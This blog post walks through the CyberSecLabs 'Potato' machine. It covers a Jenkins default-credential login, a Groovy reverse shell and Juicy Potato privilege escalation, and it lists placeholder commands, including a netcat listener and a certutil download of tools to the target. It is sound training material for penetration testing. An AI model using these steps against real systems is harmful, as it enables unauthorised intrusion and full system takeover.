Premise

In this post walkthrough, we went over one of the machines in cyberseclabs that goes by Potato. We have found default credentials on the Jenkins server that have allowed us to establish access to the windows system. We escalated our privileges with Token Impersonation.

Machine Name: Potato

Difficulty: Medium

Skills Learned

  • Jenkins Software
  • Windows Privilege Escalation
  • Token Impersonation
  • OSCP

Finding a Way In: Reconnaissance

First things first, I needed to see what I was working with. After connecting to the lab’s network, I ran a network scan to find any open doors.

I discovered a web server running on an unusual port, which immediately caught my attention. It turned out to be a Jenkins login page. Jenkins is a popular tool for automating software development, and finding it exposed is often a good sign for an attacker.

Getting a Foothold: The Jenkins Exploit

Here’s where things got interesting. I tried some common default credentials, and to my surprise, admin:admin worked! This is a classic mistake and a great reminder of why you should always change default passwords.

Once I was logged into Jenkins, I knew I could run commands on the system. I decided to use a Groovy script to create a reverse shell. This means the target machine will connect back to my computer, giving me a command-line interface to work with. After a bit of troubleshooting, I successfully got a shell on the Windows machine.

I also showed another way to run commands using PowerShell directly through Jenkins. I ran a command to check my user’s privileges and found that I had some special permissions, specifically one called SeImpersonatePrivilege, which is a golden ticket for privilege escalation.

Becoming the Admin: Privilege Escalation with Juicy Potato

My final goal was to become the “SYSTEM” user, which is the highest level of privilege on a Windows machine.

I gathered some system information and confirmed that the SeImpersonatePrivilege was my key to moving up. For this, I chose a well-known tool called Juicy Potato.

I downloaded the Juicy Potato tool and transferred it over to the target machine. I also needed a way to catch the new, more powerful shell, so I transferred a version of Netcat (a networking utility) as well. I created a small script that would use Netcat to send a shell back to my computer.

I then ran Juicy Potato, telling it to execute my script. Although the lab machine crashed at the very end (which can sometimes happen with online labs), I explained that the method itself is solid and would typically result in a full SYSTEM-level shell.

Commands I Used

Here are the technical commands I used in the terminal during the demonstration:

  • nmap -sV [IP Address]
  • sudo nc lvp [port]
  • ifconfig
  • clear
  • whoami /priv
  • sudo nano [filename]
  • sudo wget [URL]
  • cd /var/www/html
  • sysinfo
  • sudo mv [source] [destination]
  • certutil.exe -urlcache -f [URL] [output_filename]
  • echo [command] > [filename]
  • dir
  • JuicyPotato.exe -l [port] -p [program_to_execute] -t * -c [CLSID]

Video Walk-through

, , , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles